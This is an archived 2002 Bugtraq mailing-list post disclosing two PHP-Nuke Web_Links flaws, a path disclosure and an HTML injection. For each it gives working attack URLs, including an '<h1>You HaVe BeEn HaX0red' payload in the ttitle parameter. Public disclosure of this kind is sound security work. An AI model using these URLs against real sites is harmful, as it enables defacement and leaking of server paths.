[24936] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Security bugs in PhpNuke

daemon@ATHENA.MIT.EDU (=?iso-8859-1?q?Thi=E9baut?=)
Wed Apr 3 19:29:12 2002

Content-Type: text/plain;
  charset="iso-8859-1"
From: =?iso-8859-1?q?Thi=E9baut?= <thiebaut.adsl@wanadoo.fr>
To: bugtraq@securityfocus.com
Date: Wed, 3 Apr 2002 20:21:24 +0100
Cc: incidents@securityfocus.com
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <20020403182028.1DAC5472@filez>

Hello, 

I found 2 security bugs in phpnuke

The first is a path disclosure vulnerability : 
Change this 
http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink&cid=3
in that ...
http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=viewlink

The second one is hax0r style :
change this ...
http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=ratelink&lid=17&ttitle=Great_places_for_free_advertising!
to this...
http://nukesite.xxx/modules.php?op=modload&name=Web_Links&file=index&l_op=ratelink&lid=17&ttitle=<h1>You%20HaVe%20BeEn%20HaX0red!!!

By, 
Thiébaut (napnap)


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[24936] in bugtraq

Security bugs in PhpNuke

daemon@ATHENA.MIT.EDU (=?iso-8859-1?q?Thi=E9baut?=)Wed Apr 3 19:29:12 2002

daemon@ATHENA.MIT.EDU (=?iso-8859-1?q?Thi=E9baut?=)
Wed Apr 3 19:29:12 2002